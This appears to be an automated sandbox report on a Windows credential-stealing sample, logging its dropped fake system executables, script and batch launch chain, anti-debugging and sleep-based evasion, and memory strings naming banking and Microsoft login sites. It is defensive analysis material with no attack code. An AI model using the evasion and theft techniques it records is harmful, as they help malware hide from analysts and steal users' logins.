                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -587563s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -587125s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -586375s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -586047s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585759s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585625s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585466s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585339s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585234s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585122s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -585011s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -584890s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -584750s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -584639s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -584526s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -584279s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -583958s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -583813s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -583688s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -583563s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -583453s >= -30000s
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Recovery\lsass.exe TID: 1340 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 6184 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Windows\debug\explorer.exe TID: 5924 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\blockhostnet\msinto.exe TID: 7008 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe TID: 400 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Recovery\lsass.exe TID: 4972 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 2192 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\debug\explorer.exeLast function: Thread delayed
Source: C:\blockhostnet\msinto.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\debug\explorer.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\blockhostnet\msinto.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\debug\explorer.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0083A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0083A69B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0084C220
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0085B348 FindFirstFileExA,2_2_0085B348
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084E6A3 VirtualQuery,GetSystemInfo,2_2_0084E6A3
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Thread delayed: delay time: 922337203685477
Source: C:\blockhostnet\msinto.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 599888
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 599763
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 599484
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 598922
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 598531
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 597922
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 597656
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 597031
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 596766
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 596531
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 595906
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 595672
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 595234
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 594969
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 594266
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 593641
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 593188
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 592609
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 592250
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 591375
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 590906
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 590567
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 590047
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 589813
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 589150
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 588844
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 588484
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 587911
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 587563
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 587125
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 586375
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 586047
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585759
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585625
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585466
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585339
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585234
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585122
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 585011
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 584890
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 584750
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 584639
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 584526
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 584279
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 583958
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 583813
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 583688
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 583563
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 583453
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\debug\explorer.exe | Thread delayed: delay time: 922337203685477
Source: C:\blockhostnet\msinto.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user\AppData
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user\AppData\Local
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\blockhostnet\msinto.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: q9BeTagoKR.21.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: q9BeTagoKR.21.dr | Binary or memory string: discord.comVMware20,11696487552f
Source: q9BeTagoKR.21.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: q9BeTagoKR.21.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wscript.exe, 00000005.00000003.2351888371.00000000027ED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: q9BeTagoKR.21.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: q9BeTagoKR.21.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: w32tm.exe, 00000014.00000002.2439210308.0000026B5CDB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: q9BeTagoKR.21.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: q9BeTagoKR.21.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: q9BeTagoKR.21.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: conhost.exe, 00000015.00000002.3548003600.000000001AD10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|][
Source: q9BeTagoKR.21.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: q9BeTagoKR.21.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: q9BeTagoKR.21.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: q9BeTagoKR.21.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: q9BeTagoKR.21.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: q9BeTagoKR.21.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: q9BeTagoKR.21.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: q9BeTagoKR.21.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: q9BeTagoKR.21.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: q9BeTagoKR.21.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | API call chain: ExitProcess graph end node graph_2-24036
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | System information queried: ModuleInformation
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Handle closed: DEADC0DE
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0084F838
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_00857DEE mov eax, dword ptr fs:[00000030h] 2_2_00857DEE
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0085C030 GetProcessHeap,2_2_0085C030
Source: C:\blockhostnet\msinto.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0084F838
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084F9D5 SetUnhandledExceptionFilter,2_2_0084F9D5
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0084FBCA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_00858EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00858EBD
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQuerySystemInformation: Direct from: 0x1408B943E
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtProtectVirtualMemory: Indirect: 0x14033F642
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQueryInformationProcess: Direct from: 0x1408B940A
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQueryInformationProcess: Direct from: 0x1408B93D6
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtProtectVirtualMemory: Direct from: 0x1408B946B
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQuerySystemInformation: Direct from: 0x1408B94AD
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQuerySystemInformation: Direct from: 0x1408B93AE
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | NtQuerySystemInformation: Direct from: 0x1408B93CD
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Process created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe"
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"
Source: C:\blockhostnet\msinto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
Source: C:\blockhostnet\msinto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
Source: C:\blockhostnet\msinto.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: .1",5,1,"","user","675052","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\msbuild\\Microsoft\\Windows Workflow Foundation","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","Ne
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager`
Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","675052","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\msbuild\\Microsoft\\Windows Workflow Foundation","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084F654 cpuid 2_2_0084F654
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: GetLocaleInfoW,GetNumberFormatW,2_2_0084AF0F
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Queries volume information: C:\Users\user\Desktop\Zn0uX5K1ez.exe VolumeInformation
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\blockhostnet\msinto.exe | Queries volume information: C:\blockhostnet\msinto.exe VolumeInformation
Source: C:\blockhostnet\msinto.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Queries volume information: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe VolumeInformation
Source: C:\Recovery\lsass.exe | Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
Source: C:\Windows\debug\explorer.exe | Queries volume information: C:\Windows\debug\explorer.exe VolumeInformation
Source: C:\blockhostnet\msinto.exe | Queries volume information: C:\blockhostnet\msinto.exe VolumeInformation
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Queries volume information: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe VolumeInformation
Source: C:\Recovery\lsass.exe | Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
Source: C:\Windows\debug\explorer.exe | Queries volume information: C:\Windows\debug\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,2_2_0084DF1E
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0083B146 GetVersionExW,2_2_0083B146
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: Process Memory Space: msinto.exe PID: 6248, type: MEMORYSTR
